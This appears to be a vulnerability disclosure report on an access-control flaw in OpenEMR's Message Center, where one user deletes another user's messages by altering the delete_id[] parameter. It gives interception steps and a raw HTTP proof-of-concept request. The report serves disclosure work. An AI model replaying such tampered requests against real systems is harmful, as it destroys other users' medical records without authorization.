Description

I observed that users can delete messages in other’s Message Center by changing delete_id parameter to delete_id value of message which belongs to other.

Step:

• Login with Physician account and determine delete_id[] of messages in Physician’s Message Center
• Login with Clinician account.
• Go to Clinician 's Message Center, delete a message in Message Center and use Burpsuite to intercept this request.
• Modify delete_id[] to delete_id[] of message which belongs to Physician’s Message Center.
• Message with corresponding delete_id[] in Physicican’s Message Center will be deleted.

Proof of Concept

POST /openemr/interface/main/messages/messages.php?showall=&sortby=pnotes.date&sortorder=desc&begin=0&form_active=1 HTTP/1.1
Host: demo.openemr.io
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.openemr.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://demo.openemr.io/openemr/interface/main/messages/messages.php?form_active=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OpenEMR=F%2CirXOlXHBMtyJUilGMZ0%2C9PvCyhZXGdzItmkF7g5BnT8pyP
Connection: close

task=delete&delete_id%5B%5D=7